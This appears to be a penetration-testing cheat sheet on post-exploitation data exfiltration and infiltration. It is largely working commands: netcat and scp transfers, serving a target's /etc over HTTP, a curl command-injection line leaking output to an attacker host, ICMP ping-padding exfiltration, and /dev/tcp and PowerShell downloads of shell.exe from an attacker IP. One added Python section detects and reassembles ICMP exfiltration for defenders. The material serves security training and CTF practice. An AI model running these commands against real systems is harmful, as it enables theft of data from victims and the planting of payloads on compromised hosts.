Data Exfiltration Post Exploitation

Personal discoveries added but majorly derived from: https://raw.githubusercontent.com/RackunSec/Penetration-Testing-Grimoire/master/Post%20Exploitation/data-exfiltration-infiltration.md

Last updated 1 year ago

Using netcat

On the receiving end running,

nc -l -p 1234 > out.file

will begin listening on port 1234.

On the sending end running,

nc -w 3 [destination] 1234 < out.file

will connect to the receiver and begin sending the file (the -w 3 option closes the connection after 3 seconds of idle time once the transfer is done).

Python HTTP Server

If Python 3 is installed on the target system, you can serve the current directory over HTTP with,

python3 -m http.server 5432

If only Python 2.x is installed on the target system, you can start the server using the following command in whatever directory you wish to share temporarily,

www-data@target-system:/etc# python -m SimpleHTTPServer 5432

This will instantly share the files on the target system in /etc (as you see, that is where I started the service) via HTTP on port 5432. You can then use wget recursively to pull all files found, like so, from the attacker machine,

root@attacker-system:~/ctf/target/# wget -r http://(TARGET IP ADDRESS):5432

SCP (SSH)

If SSH is installed on the target system, we can simply use scp to exfiltrate data from the target server onto our attacker machine. First, we need to ensure that SSH is running on the attacker machine to accept the connection and file from the target. Then, we can use the following syntax to transfer the file,

user@target-system:~$ scp -P (PORT OF SSH ON ATTACKER) (FILENAME) \
 (USER ON ATTACKER SYSTEM)@(ATTACKER IP ADDRESS):/path/on/attacker/machine.extension

HTTP Logs

If command injection is possible on the target server, but it's not possible to save files anywhere to create a shell (super-unprivileged user), we can use curl in combination with an interpolated command output to make an HTTP request to our local HTTP server on the attacker system as so,

ping 127.0.0.1;curl http://(ATTACKER IP ADDRESS)?username=$(whoami)

Then, in our local HTTP logs, we will see the output of $(whoami) as the username GET request parameter.

Using Ping for Data Exfiltration

To use ping, we first break the file up into 16-byte chunks with xxd -c 16, then use ping's -p argument to pad each ICMP request with one 16-byte chunk. The chunking looks like so,

user@target-machine:~$ echo "Hello World. We will be exfiltrating this data." > file.out
user@target-machine:~$ xxd -p -c 16 file.out
48656c6c6f20576f726c642e20576520
77696c6c20626520657866696c747261
74696e67207468697320646174612e0a

Then, we start Wireshark on the attacker machine and listen for ICMP, using the icmp LibPCAP filter. Now, we simply use these 16 byte chunks and pad the ICMP requests to the attacker machine. We can script this like so,

user@target-machine:~$ for bytes in $(xxd -p -c 16 file.out); do ping -c 1 -p $bytes (ATTACKER IP ADDRESS); done

In Wireshark, the hexadecimal bytes will be translated into ASCII. This can be cleaned up by using tcpdump on the attacker machine and parsing the ASCII/string output.
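From the defender's side, the same chunking makes this traffic easy to pick out and reconstruct during incident response. The following is an added example, not part of the original page: it parses raw IPv4/ICMP packets, drops echo requests that carry ping's default padding, and reassembles the 16-byte pattern per flow in sequence order. It assumes iputils ping on 64-bit Linux (16-byte timestamp, default fill byte equal to its offset) and uses constructed sample packets built from the hex chunks shown above rather than a real capture.

```python
import struct

# Assumption: iputils ping on 64-bit Linux sends 56 data bytes, a 16-byte
# timestamp followed by bytes whose value equals their offset (0x10, 0x11, ...).
TS_LEN = 16

def parse_ipv4_icmp(pkt: bytes):
    """Return (src, dst, icmp_type, seq, data) for a raw IPv4/ICMP packet, else None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or pkt[9] != 1:
        return None
    icmp = pkt[(pkt[0] & 0x0F) * 4:]
    if len(icmp) < 8:
        return None
    src = ".".join(map(str, pkt[12:16]))
    dst = ".".join(map(str, pkt[16:20]))
    itype, _, _, _, seq = struct.unpack("!BBHHH", icmp[:8])
    return src, dst, itype, seq, icmp[8:]

def is_default_payload(data: bytes) -> bool:
    """True when the bytes after the timestamp look like an unmodified ping."""
    return all(data[i] == (i & 0xFF) for i in range(TS_LEN, len(data)))

def reassemble_icmp_exfil(packets, pattern_len=16):
    """Keep echo requests whose padding is not ping's default and rebuild the -p
    pattern per (src, dst) flow in sequence order. ping repeats the pattern across
    the data area and the timestamp overwrites the first copy, so the second is used."""
    flows = {}
    for pkt in packets:
        parsed = parse_ipv4_icmp(pkt)
        if parsed is None:
            continue
        src, dst, itype, seq, data = parsed
        if itype != 8 or len(data) < 2 * pattern_len or is_default_payload(data):
            continue
        flows.setdefault((src, dst), []).append((seq, data[pattern_len:2 * pattern_len]))
    return {f: b"".join(c for _, c in sorted(chunks)) for f, chunks in flows.items()}

# Constructed sample traffic (not a real capture) built from the hex chunks shown above.
def _echo_request(src, dst, seq, data):
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0x1234, seq) + data  # checksum left zero
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return ip + icmp

CHUNKS = ["48656c6c6f20576f726c642e20576520", "77696c6c20626520657866696c747261",
          "74696e67207468697320646174612e0a"]
SAMPLE = [_echo_request("10.0.0.5", "10.0.0.1", i, b"\0" * TS_LEN + (bytes.fromhex(h) * 4)[TS_LEN:56])
          for i, h in enumerate(CHUNKS, 1)]
SAMPLE.append(_echo_request("10.0.0.7", "10.0.0.1", 1, b"\0" * TS_LEN + bytes(range(TS_LEN, 56))))
```

Feeding the raw packet bytes of a pcap (minus the link-layer header) to reassemble_icmp_exfil gives one reconstructed blob per suspicious source/destination pair; the benign ping from 10.0.0.7 is ignored because its padding matches the default.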

Data Infiltration

FTP

/dev/tcp/

Bash exposes the /dev/tcp/ pseudo-device, which lets us open TCP connections with plain redirections. First, we simply start a listener on our attacker machine and feed it a file like so,

root@attacker-machine:~# nc -lvvp 666 < host-discov.sh 

Then, we simply cat the /dev/tcp/ path for our attacker socket (ip/port) and redirect the output directly into a file or tee, like so,

root@nodered:/tmp# cat < /dev/tcp/(ATTACKER IP ADDRESS)/666 > host-discov.sh

Notice the format: /dev/tcp/ followed by the attacker IP address and port, separated by forward slashes as though it were a simple file.

Powershell.exe

If we have compromised a system and are in a reverse PowerShell session, we can infiltrate data to the system using the following PowerShell commands,

PS> Invoke-WebRequest -Uri http://(ATTACKER IP):(PORT)/shell.exe -OutFile C:\Users\(TARGET USER)\Desktop\shell.exe

PowerShell 3.0+ aliases wget to Invoke-WebRequest, so it can be called like so,

PS> wget http://(ATTACKER IP ADDRESS)/shell.exe -OutFile shell.exe

You can use FTP for data infiltration on any OS if you happen to find it installed on a target machine. Check out for more information on how to infiltrate data and binaries to a target system using FTP.
